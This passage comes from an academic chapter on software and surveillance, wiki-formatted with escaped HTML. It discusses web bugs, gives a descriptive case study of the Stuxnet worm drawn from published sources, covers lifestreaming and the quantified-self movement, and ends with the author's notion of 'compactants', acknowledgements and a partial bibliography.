Of course, one element missing from this typology is that of surveillance, and indeed it is no surprise that web bugs perform part of the tracking technologies used by companies to monitor staff. For example, in 2006 Hewlett Packard used web bugs from [http://readnotify.com/ readnotify.com] to trace insider leaks to the journalist Dawn Kawamoto and later confirmed in testimony to a U.S. House of Representatives subcommittee that it's ‘still company practice to use e-mail bugs in certain cases’ (Evers, 2006; Fried, 2006).&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; As can be seen, this is an extremely textured environment that currently offers little in terms of diagnosis or even warnings to the user. The industry itself, which prefers the term “clear GIF” to web bug, is certainly keen to avoid regulation and keeps itself very much to itself in order to avoid raising too much unwarranted attention. Some of the current discussions over the direction of regulation on this issue have focused on the “do not track” flag, which would signal a user's opt-out preference within an HTTP header. Unfortunately, very few companies respect the &amp;quot;do not track&amp;quot; header and there is currently no legal requirement that they do so in the US, or elsewhere (W3C, 2012). Although one can see in this context the current debate over the EU ePrivacy Directive, where the Article 29 Working Party (A29 WP) has stated that ‘voluntary plans drawn up by Europe's digital advertising industry representatives, the European Advertising Standards Alliance (EASA) and IAB Europe, do not meet the consent and information requirements of the recently revised ePrivacy Directive’ (Baker, 2012).&amp;amp;nbsp; &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; One of the newer, and perhaps indicative directions of travel of these new web bugs under development is called [http://www.persianstat.ir/ PersianStat], which claims to keep 'an eye on 1091622 websites': an Iranian web tracking and data analytics website, it shows that this new code ecology is not purely a Western phenomenon. With the greater use of computational networked devices in everyday life, from mobile phones to GPS systems, these forms of tracking systems will only become more invasive and aggressive in collecting data from our everyday life and encounters. Indeed, it is unsurprising to find that Americans, for example, are not comfortable with the growth in use of these tracker technologies. Pew (2012) found:&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;that 73 percent of&amp;amp;nbsp;Americans said they would 'not be okay' with&amp;amp;nbsp;being tracked (because it would be an invasion&amp;amp;nbsp;of privacy)… Only 23 percent said they'd be 'okay' with&amp;amp;nbsp;tracking (because it would lead to better and&amp;amp;nbsp;more personalized search results)…Despite all those high-percentage objections&amp;amp;nbsp;to the idea of being tracked, less than half of&amp;amp;nbsp;the people surveyed -- 38 percent -- said they&amp;amp;nbsp;knew of ways to control the data collected&amp;amp;nbsp;about them. (Garber, 2012; Pew, 2012).&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
This contradiction between the ability of these computational systems and surfaces to supply a commodity to the user, and the need to raise income through the harvesting of data which is in turn sold to advertisers and marketing companies, shows that this is an unstable situation. It also serves to demonstrate the extent&amp;amp;nbsp;to which users are just not aware of the subterranean depths of their computational devices and the ability&amp;amp;nbsp;of these general computing platforms to disconnect the user interface from the actual intentions or functioning of the device, whilst giving the impression to the user that they remain fully in control of the computer. As Garber observes, ‘underground network, surface illusion… How much do we actually want to know about this stuff? Do we truly want to understand the intricacies of data-collection and personalization and all the behind-the-screen work that creates the easy, breezy experience of search ... or would we, on some level, prefer that it remain as magic?’ (Garber, 2012). An issue helpfully illustrated by the next case study of the Stuxnet virus, which shows the extent to which the magic of software can conceal its true function.&amp;lt;br&amp;gt;&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
== '''Stuxnet'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Stuxnet[6] is a computer worm which experts now believe was aimed at the Iranian uranium-enrichment facility at Natanz, Iran.[7] The Stuxnet worm, a subclass of computer virus, copied itself repeatedly across computer systems until it found the host that met its ‘strike conditions’, that is, the location it was designed to attack, and activated its ‘digital warhead’, which may monitor, damage, or even destroy its target. The name, ‘Stuxnet,’ is ‘derived from some of the filename/strings in the malware - mrxcls.sys, mrxnet.sys’, the first part, 'stu', comes from the (.stub) file, mrxcls.sys; the second part, 'xnet', comes from mrxnet.sys (Kruszelnicki, 2011; mmpc2, 2010). Due to the sophistication of the programming involved, this worm is considered to have reached a new level in cyberwarfare. Stuxnet has been called the first 'weaponized' computer virus, and it would have required huge resources, like a test facility to model a nuclear plant, to create and launch it (Cherry, 2010). As Liam O Murchu, an operations manager for Symantec, explained:&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;Unlike the millions of worms and viruses that turn up on the Internet every year, this one was not trying to steal passwords, identities or money. Stuxnet appeared to be crawling around the world, computer by computer, looking for some sort of industrial operation that was using a specific piece of equipment, a Siemens S7-300 programmable logic controller. (60 Minutes, 2012b)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
The Stuxnet worm works by undertaking a very complex stealth infection and covers its tracks by recording data from the nuclear processing system which it then plays back to the operators to disguise that it is actually gently causing the centifuges to fail. This is known as a ‘man-in-the-middle attack’ because it fakes industrial process control sensor signals so an infected system does not exhibit abnormal behavior and therefore raise alarm. Again, cleverly, the faults it creates in the plant are likely to occur weeks after the sabotaged effort, and in a targeted way, through the fatiguing of the motors – this looks like a standard failure rather than an attack. Indeed, Iran later confirmed that a number of its centrifuges had been affected by an attack (CBS News, 2010).&amp;amp;nbsp;A ‘senior Iranian intelligence official said an estimated 16,000 computers were infected by the Stuxnet virus’ (Assocated Press, 2012). The Stuxnet worm is also interesting because it has built-in ''sunset code'' that causes the worm to erase itself after 24 June, 2012, and hence hide its tracks. As Zetter explains:&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;once the code infects a system, it searches for the presence of two kinds of frequency converters made by the Iranian firm Fararo Paya and the Finnish company Vacon, making it clear that the code has a precise target in its sights… Stuxnet begins with a nominal frequency of 1,064 Hz… then reduces the frequency for a short while before returning it back to 1,064 Hz… Stuxnet [then] instructs the speed to increase to 1,410 Hz, which is 'very close to the maximum speed the spinning aluminum IR-1 rotor can withstand mechanically',… [but] before the rotor reaches the tangential speed at which it would break apart… within 15 minutes after instructing the frequency to increase, Stuxnet returns the frequency to its nominal 1,064 Hz level. Nothing else happens for 27 days, at which point a second attack sequence kicks in that reduces the frequency to 2 Hz, which lasts for 50 minutes before the frequency is restored to 1,064 Hz. Another 27 days pass, and the first attack sequence launches again, increasing the frequency to 1,410 Hz, followed 27 days later by a reduction to 2 Hz. (Zetter, 2011)&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Stuxnet disguises all of this activity by overriding the data control systems and sending commands to disable warning and safety controls that would normally alert plant operators to these dangerous frequency changes. Stuxnet is intriguing because it is not a general purpose attack, but designed to unload its digital warheads under specific conditions against a specific threat target. It is also remarkable in the way in which it disengages the interface, the screen for the user, from the underlying logic and performance of the machine.&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Indeed, there has been a great deal of speculation about whether a state would have been required to develop it due to the complexities involved in being able to test such a worm before releasing it into the wild (Markoff and Sanger, 2010). Richard Clarke, the former chief of counter-terrorism under Presidents Clinton and Bush, argues that the built-in fail-safes are an important clue to Stuxnet’s source and that they point to the kinds of procedures found in a Western government. He says, ‘If a [Western] government were going to do something like this…then it would have to go through a bureaucracy, a clearance process, [and] somewhere along the line, lawyers would say, “We have to prevent collateral damage,” and the programmers would go back and add features that normally you don’t see in the hacks. And there are several of them in Stuxnet’ (Gross, 2011). Indeed, the complexities and structure of the worm are such that at least thirty people would have been working on it simultaneously in order to build a worm of this kind (Zetter, 2010). This is especially true of a worm that launched a so-called ‘zero-day attack’, that is, using a set of techniques that are not public nor known by the developer of the attacked system, in this case Microsoft and Siemens. In actuality it was remarkable for exploiting four different zero-day vulnerabilities (Gross, 2011). Because of the layered approach to its attack and the detailed knowledge required of Microsoft Windows, SCADA (Supervisory Control And Data Acquisition) and PLCs (Programmable Logic Controllers) systems, this would have been a very large project to develop and launch. Indeed, Eric Byres, chief technology officer for Byres Security, has stated: ‘we’re talking man-months, if not years, of coding to make it work the way it did' (quoted in Zetter, 2010).&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; The two chief capabilities of Stuxnet are: (1) to identify its target precisely using a number of software based markers that give the physical identity of the location away. Indeed, ‘attackers [had] full, and I mean this literally, full tactical knowledge of every damn detail of [the Natanz] plant’ (60 Minutes, 2012b); and (2) the capability to disengage control systems from physical systems and to provide a stealth infection into the computer system that would fool the operators of the plant (also known as a ‘man-in-the-middle attack’). This was achieved through the use of two ‘digital warheads’, called 417 and 315. The smaller, 315, was designed to slowly reduce the speed of rotors leading to cracks and failures, and the second larger warhead, 417, manipulated valves in the centrifuge and faking industrial process control sensor signals by modeling the centifuges which were grouped into 164 cascades (Langner, 2011). Indeed, Langner (2011) described this evocatively as ‘two shooters from different angles’. 
The Stuxnet worm was launched some time in 2009/2010 and shortly afterwards:[8]&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;the all-important centrifuges at Iran's nuclear fuel enrichment facility at Natanz began failing at a suspicious rate. Iran eventually admitted that computer code created problems for their centrifuges, but downplayed any lasting damage. Computer security experts now agree that code was a sophisticated computer worm dubbed Stuxnet, and that it destroyed more than 1,000 centrifuges. (60 Minutes, 2012a)&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
The origin of the name Stuxnet is hypothesized from an analysis of the approximately 15,000 lines of programming code. The analysis performed by Langner (2011) and others, was a close reading and reconstruction of the programming logic by taking the machine code, disassembling it and then attempting to convert it into the C programming language. The code could then be analysed for system function calls, timers, and data structures, in order to try to understand what the code was doing (Langner, 2011). Indeed, as part of this process a reference to 'Myrtus' was discovered, and the link made to 'Myrtus as an allusion to the Hebrew word for Esther. The Book of Esther tells the story of a Persian plot against the Jews, who attacked their enemies pre-emptively' (Markoff and Sanger, 2010).[9] Whilst no actor has claimed responsibility for Stuxnet, there is a strong suspicion that either the United States or Israel had to be involved in the creation of such a sophisticated attack virus (see Sanger, 2012). Its attack appears to have been concentrated on a number of selected areas, with Iran at the centre (see table 1).&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&amp;amp;nbsp;&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
 &lt;br /&gt;
  [[Image:BerryStuxnet.jpg|left|500x450px|Percentage Distribution of Stuxnet Infections by Region (adapted from Matrosov et al n.d.)]] &lt;br /&gt;
&lt;br /&gt;
**Iran -&amp;amp;nbsp;52.2% &lt;br /&gt;
**Indonesia -&amp;amp;nbsp;17.4% &lt;br /&gt;
**India -&amp;amp;nbsp;11.3% &lt;br /&gt;
**Pakistan -&amp;amp;nbsp;3.6% &lt;br /&gt;
**Uzbekistan-&amp;amp;nbsp;2.6% &lt;br /&gt;
**Russia -&amp;amp;nbsp;2.1% &lt;br /&gt;
**Kazakhstan -&amp;amp;nbsp;1.3% &lt;br /&gt;
**Rest of World -&amp;amp;nbsp;9.4%&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
''Table 1: Percentage Distribution of Stuxnet Infections by Region (adapted from Matrosov et al n.d.).'' &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt;Clearly, this kind of attack could be mobilized at targets other than nuclear enrichment facilities, and indeed the stealth and care with which it attempts to fool the operators of the plants shows that computational devices will undoubtedly be targets for monitoring, surveillance, control and so forth in the future. But, of course, once the code for undertaking this kind of sophisticated cyberattack is out in the open it is relatively trivial to decode the computer code and learn techniques that would have taken many years of development in a very short time. As Sean McGurk explains, ‘you can download the actual source code of Stuxnet now and you can repurpose it and repackage it and then, you know, point it back towards wherever it came from’ (60 Minutes, 2012b). Indeed, a different worm, called Duqu, has already been discovered, albeit with purposes linked to the collection of the data on industrial control systems and structures, a so-called ‘Trojan’ (Hopkins, 2011).[10] As Alexander Gostev reports: &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;There were a number of projects involving programs based on the 'Tilded' [i.e. Stuxnet] platform throughout the period 2007-2011. Stuxnet and Duqu are two of them – there could have been others, which for now remain unknown. The platform continues to develop, which can only mean one thing – we’re likely to see more modifications in the future. (2012)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
The increased ability of software and code via computational devices to covertly monitor, control and mediate, both positively and negatively, is not just a case of interventions for deceiving the human and non-human actors that make up part of these assemblages. In the next section I want to look at the willing compliance with data collection, indeed the enthusiastic contribution of real-time data to computational systems as part of the notion of lifestreams, and more particularly the quantified self movement.&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
== '''Lifestreams'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Lastly, I want to connect these developments in web-bugs and worms with the growth in the use of self-monitoring technologies called lifestreaming, or the notion of the quantified self.[11] These have expanded in recent years as the ‘real-time streams’ platforms have expanded, like Twitter and Facebook. Indeed, some argue that ‘we’re finally in a position where people volunteer information about their specific activities, often their location, who they’re&amp;amp;nbsp;with, what they’re doing, how they feel about what they’re doing, what they’re talking about…We’ve never had data like that before, at least not at that level of granularity’ (Rieland, 2012). This has been usefully described by the ''Economist'', who argue that the:&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;idea of measuring things to chart progress towards a goal is commonplace in large organisations. Governments tot up trade figures, hospital waiting times and exam results; companies measure their turnover, profits and inventory. But the use of metrics by individuals is rather less widespread, with the notable exceptions of people who are trying to lose weight or improve their fitness…But some people are doing just these things. They are an eclectic mix of early adopters, fitness freaks, technology evangelists, personal-development junkies, hackers and patients suffering from a wide variety of health problems. What they share is a belief that gathering and analysing data about their everyday activities can help them improve their lives—an approach known as 'self-tracking', 'body hacking' or 'self-quantifying'. (2012)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
This phenomena of using computational devices to monitor health signals and to feed them back into calculative interfaces, data visualisations, real-time streams, etc. is the next step in social media. This closes the loop of personal information online, which, although it remains notionally private, is stored and accessed by corporations who wish to use this biodata for data mining and innovation surfacing. For example:&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;The Zeo [headband]... has already generated the largest-ever database on sleep stages, which revealed differences between men and women in REM-sleep quantity. Asthmapolis also hopes to pool data from thousands of inhalers fitted with its Spiroscout [asthma inhaler] sensor in an effort to improve the management of asthma. And data from the Boozerlyzer [alcohol counting] app is anonymised and aggregated to investigate the variation in people’s response to alcohol. (Economist, 2012)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Lifestreams were originally an idea from David Gelernter and Eric Freeman in the 1990s (Freeman, 1997; Gelernter, 2010), which they described as:&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;a time-ordered stream of documents that functions as a diary of your electronic life; every document you create and every document other people send you is stored in your lifestream. The tail of your stream contains documents from the past (starting with your electronic birth certificate). Moving away from the tail and toward the present, your stream contains more recent documents -- papers in progress or new electronic mail; other documents (pictures, correspondence, bills, movies, voice mail, software) are stored in between. Moving beyond the present and into the future, the stream contains documents you ''will'' need: reminders, calendar items, to-do lists. You manage your lifestream through a small number of powerful operators that allow you to transparently store information, organize information on demand, filter and monitor incoming information, create reminders and calendar items in an integrated fashion, and 'compress' large numbers of documents into overviews or executive summaries. (Freeman, 2000)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Gelernter originally described these ‘chronicle streams’ (Gelernter, 1994), highlighting both their narrative and temporal dimensions related to the storage of documentation and texts. Today we are more likely to think of them as ‘real-time streams’ and the timeline functions offered by systems like Twitter, Facebook and Google+. These are increasingly the model of interface design that is driving the innovation in computation, especially in mobile and locative technologies. However, in contrast to the document-centric model that Gelernter and Freeman were describing, there are also the micro-streams of short updates, epitomized by Twitter, which has short text-message sized 140 character updates. Nonetheless this is still enough text space to incorporate a surprising amount of data, particularly when geo, image, weblinks, and so forth are factored in. Stephen Wolfram was one of the first people to collect their data systematically.&amp;amp;nbsp;As he explains, Wolfram started in 1989: 'So email is one kind of data I’ve systematically archived. And there’s a huge amount that can be learned from that.&amp;amp;nbsp;Another kind of data that I’ve been collecting is keystrokes. For many years, I’ve captured every keystroke I’ve typed—now more than 100 million of them' (Wolfram, 2012). &amp;amp;nbsp;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; This kind of self-collection of data is certainly becoming more prevalent and in the context of reflexivity and self-knowledge, it raises interesting questions about the increasing use of mathematics and computation to understand and control the self. The scale of data that is collected can also be relatively large and unstructured. Nonetheless, better data management and techniques for searching and surfacing information from unstructured or semi-structured data will no doubt be revealing about our everyday patterns in the future.[12]&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Mobile 'apps' - small, relatively contained applications that usually perform a single specific function - have accelerated this way of collecting and sending data. For example, the Twitter app on the iPhone allows the user to send updates to their timeline, but also search other timelines, check out profiles, streams and so on. When created as apps, however, they are also able to use the power of the local device, especially if it contains the kinds of sophisticated sensory circuitry that is common in smartphones, to log GPS geographic location, direction, etc. This is when life-streaming becomes increasingly similar to the activity of web bugs in monitoring and collecting data on the users that are active on the network. Indeed, activity streams have become a standard which is increasingly being incorporated into software across a number of media and software practices (see ActivityStreams n.d.). An activity stream essentially encodes a user event or activity into a form that can be computationally transmitted and later aggregated, searched and processed: &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
*In its simplest form, an activity consists of an ''actor'', a ''verb'', an ''object'', and a ''target''. It tells the story of a person performing an action on or with an object -- 'Geraldine posted a photo to her album' or 'John shared a video'. In most cases these components will be explicit, but they may also be implied. (ActivityStreamsWG, 2011, original emphasis)&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
This data and activity collection is only part of the picture, however. In order to become reflexive data it must be computationally processed from its raw state, which may be structured, unstructured, or a combination of the two. At this point it is common for the data to be visualized, usually through a graph or timeline, but there are also techniques such as heat-maps, graph theory, and so forth that enable the data to be processed and reprocessed to tease out patterns in the underlying data set. In both the individual and aggregative use case, in other words for the individual user (or lifestreamer) or organization (such as Facebook), the key is to pattern match and compare details of the data, such as against a norm, a historical data set, or against a population, group, or class or others.[13] &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; The patterned usage is therefore a dynamic real-time feedback mechanism, in terms of providing steers for behaviour, norms and so forth, but also offering a documentary narcissism that appears to give the user an existential confirmation and status. Even in its so-called gamification forms, the awarding of competitive points, badges, honours and positional goods more generally is the construction of a hierarchical social structure within the group of users. It also encourages the user to think of themselves as a set of partial objects, fragmented dividuals, or loosely connected properties, collected as a time-series of data-points and subject to intervention and control. This can be thought of as a computational 'care of the self', facilitated by an army of oligopticans (Latour, 2005) in the wider computational environment that observe and store behavioural and affective data. However, this self is reconciled through the code and software that makes the data make sense. The code and software are therefore responsible for creating and maintaining the meaning and narratives through a stabilisation and web of meaning for the actor.[14] &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; I now want to turn to how we might draw these case studies together to think about living in code and software and the implications for wider study in terms of research and theorisation of computational society.&amp;lt;br&amp;gt;&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
== '''Conclusions'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
It seems that a thread runs through web bugs, viruses and now life-streaming itself: this is data collection, monitoring and real-time feedback, whether overt or covert. Whilst we can continue to study these phenomena in isolation, and indeed there can be very productive knowledge generated from this kind of research, it seems to me that we need to attend to the computationality represented in code and software to better understand such software ecologies (Berry, 2011).&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; One of the most interesting aspects of these systems is that humans in many cases become the vectors that both enable the data transfers and carry the data that fuels the computational economy. Our movements between systems, carrying USB sticks and logging into email accounts and distant networks, creates the channels through which data flows or an infection is spread. The ability of these viruses to take on some of the features of web bugs and learn our habits and preferences in real-time whilst secreting themselves within our computer systems raises important questions, particularly in relation to the complexity and obfuscated nature of the code and its ability to track and collect data surreptitiously. However, users are actively downloading apps that advertise the fact that they collect this data and seem to genuinely find an existential relief or recognition in their movements being recorded and available for later playback or analysis. Web bugs are in many ways life streams - albeit life streams that have not been authorized by the user whom they are monitoring. This collection of what we might call ''compactants'' are designed to ''passive-aggressively'' record data.[15] With the notion of ''compactants'' (computational actants) I want to particularly draw attention to this passive-aggressive feature of computational agents that are collecting information. Both in terms of their passive quality – under the surface, relatively benign and silent – but also the fact that they are aggressive in their hoarding of data – monitoring behavioural signals, streams of affectivity and so forth. The word ''compact'' also has useful overtones of having all the necessary components or functions neatly fitted into a small package, and compact as in conciseness in expression. The etymology from the Latin ''compact'' for closely put together, or joined together, also neatly expresses the sense of what web bugs and related technologies are. That is, compactants are interesting in terms of the distributed agency they enable, which can be understood through the notion of ''companion actants'' (see Haraway, 2003).&amp;amp;nbsp;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Interestingly, compactants are structured in such a way that they can be understood as having a dichotomous structure of data-collection/visualisation, each of which is a specific mode of operation. Naturally, due to the huge quantities of data that is often generated, the computational processing and aggregation is often offloaded to the ‘cloud’, or server computers designed specifically for the task and accessed via networks. Indeed, many viruses, for example, often seek to ‘call home’ to report their status, upload data, or offer the chance of being updated, perhaps to a more aggressive version of themselves or to correct bugs.&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; We might also think about the addressee of these wider computational systems made up of arrays or networks of compactants, which in many cases is a future actor. 
Within the quantified-self movement there is an explicit recognition that the 'future self' will be required to undo bad habits and behaviours of the present-self. That is, that there is an explicit normative context to a ''future'' self, who you, as the ''present'' self may be treating unfairly, immorally or without due regard to what has been described as 'future self continuity' (Tugend, 2012). This inbuilt tendency toward the ''futural'' is a fascinating reflection of the internal temporal representation of time within computational systems, that is time-series structured streams of real-time data, often organised as lists. Therefore the past (as stored data), present (as current data collection, or processed archival data), and future (as both the ethical addressee of the system and potential provider of data and usage) are often deeply embedded in the code that runs these systems. In some cases the future also has an objective existence as a probabilistic projection, literally a ''code-object'', which is updated in real-time and which contains the major features of the future state represented as a model; computational weather prediction systems and climate change models are both examples of this.&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; There are many examples of how attending to the code and software that structures many of the life, memory and biopolitical systems and industries of contemporary society could yield similarly revealing insights into both our usage of code and software, but also the structuring assumptions, conditions and affordances that are generated. Our use of computational models is growing, and our tendency is to confuse the screenic representation visualised by code/software with what we might call the real – not to mention our failure to appreciate the ways in which code’s mediation is co-constructive of, and deeply involved in, the stabilisation of everyday life today. Even so, within institutional contexts, code/software has not fully been incorporated into the specific logics of these social systems, and in many ways undermines these structural and institutional forms. We must remain attentive to the fact that software engineering itself is a relatively recent discipline and its efforts at systematisation and rationalisation are piecemeal and incomplete, as the many hugely expensive software system failures attests. Of course, this code/software research is not easy, the techniques needed are still in their infancy, and whilst drawing on a wide range of scholarly work from the sciences, social sciences and the arts and humanities we are still developing our understanding. But this should give hope and direction to the critical theorists, both of the present looking to provide critique and counterfactuals, but also ''of'' the future, as code/software is a particularly rich site for intervention, contestation and the ''unbuilding'' of code/software systems.[16] &amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
== '''Acknowledgements'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; I am very grateful to the ''Forskningsrådet'' (Research Council of Norway) for the ''Yggdrasil'' fellowship ref: 211106 which funded my sabbatical in Oslo in 2012. I would also like to thank Anders Fagerjord, ''Institutt for medier og kommunikasjon'' (IMK), University of Oslo, for the kind invitation to be based at the university. An earlier version of this chapter was presented at UnlikeUs in March 2012, at the University of Amsterdam, and I would like to thank Geert Lovink for the kind invitation to present this work. I am also grateful to have had the opportunity to present versions of the chapter in this book to: PhiSci seminar series, organised by Rani Lill Anjum, CauSci (Causation in Science) and the UMB School of Economics and Business; ''Institutt for medier og kommunikasjon'' (IMK) seminar series, invited by Espen Ytreberg, University of Oslo; Digital Humanities Workshop, organized by Caroline Bassett, University of Sussex; the Media Innovations Colloquium organized by Tanja Storsul, ''Institutt for medier og kommunikasjon'' (IMK), University of Oslo; and the Archive in Motion workshop, ''Nasjonal Bibliotek'' organised by Ina Blom, University of Oslo. I would also like to express my deepest thanks to Michael Najjar for the kind permission to use his work, 'The sublime brain [of Jonathon]', for the cover of the book which represents a neuronal frontal portait of an individual, for more of his excellent work please see [http://www.michaelnajjar.com]. Many thanks are also due to Trine for proofing the documents included in this living book. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
== '''Bibliography'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
60 Minutes (2012a) 'Fmr. CIA head calls Stuxnet virus &amp;quot;good idea&amp;quot;', ''60 Minutes'', accessed 04/03/2012, http://www.cbsnews.com/8301-18560_162-57388982/fmr-cia-head-calls-stuxnet-virus-good-idea/ &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; 60 Minutes (2012b) 'Stuxnet: Computer worm opens new era of warfare', ''60 Minutes'', accessed 04/03/2012, http://www.cbsnews.com/8301-18560_162-57390124/stuxnet-computer-worm-opens-new-era-of-warfare/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
ActivityStreams (n.d.) 'Activity Streams', accessed 04/03/2012, http://activitystrea.ms/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
ActivityStreamsWG (2011) 'JSON Activity Streams 1.0', Activity Streams Working Group, accessed 04/03/2012, http://activitystrea.ms/specs/json/1.0/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Associated Press (2012) 'Iran says Stuxnet virus infected 16,000 computers', ''Associated Press'', accessed 04/03/2012, http://www.foxnews.com/world/2012/02/18/iran-says-stuxnet-virus-infected-16000-computers/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Berry, D. M. (2011) ''The Philosophy of Software: Code and Mediation in the Digital Age'', London: Palgrave. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Baker, J. (2012) 'European Watchdog Pushes for Do Not Track Protocol', accessed 10/03/2012, http://www.pcworld.com/businesscenter/article/251373/european_watchdog_pushes_for_do_not_track_protocol.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
CBS News (2010) 'Iran Confirms Stuxnet Worm Halted Centrifuges', ''CBSNews'', accessed 04/03/2012, http://www.cbsnews.com/stories/2010/11/29/world/main7100197.shtml &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Cherry, S. (2010) 'How Stuxnet Is Rewriting the Cyberterrorism Playbook', ''IEEE Spectrum: Inside Technology'', accessed 04/03/2012, http://spectrum.ieee.org/podcast/telecom/security/how-stuxnet-is-rewriting-the-cyberterrorism-playbook &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Cryptome (2010) 'Stuxnet Myrtus or MyRTUs?', accessed 04/03/2012, http://cryptome.org/0002/myrtus-v-myRTUs.htm &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Deuze, M., Blank, P. and Speers, L. (2012) 'A Life Lived in Media', ''Digital Humanities Quarterly'', Winter 2012, Volume&amp;amp;nbsp;6&amp;amp;nbsp;Number&amp;amp;nbsp;1, accessed 29/02/2012, http://digitalhumanities.org/dhq/vol/6/1/000110/000110.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Dobias, J. (2010) 'Privacy Effects of Web Bugs Amplified by Web 2.0', in Fischer-Hübner, S., Duquenoy, P., Hansen, M., Leenes, R., and Zhang, G. (eds.) ''Privacy and Identity Management for Life'', London: Springer. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Economist (2012) 'Counting every moment', ''The Economist'', accessed 02/03/2012, http://www.economist.com/node/21548493 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
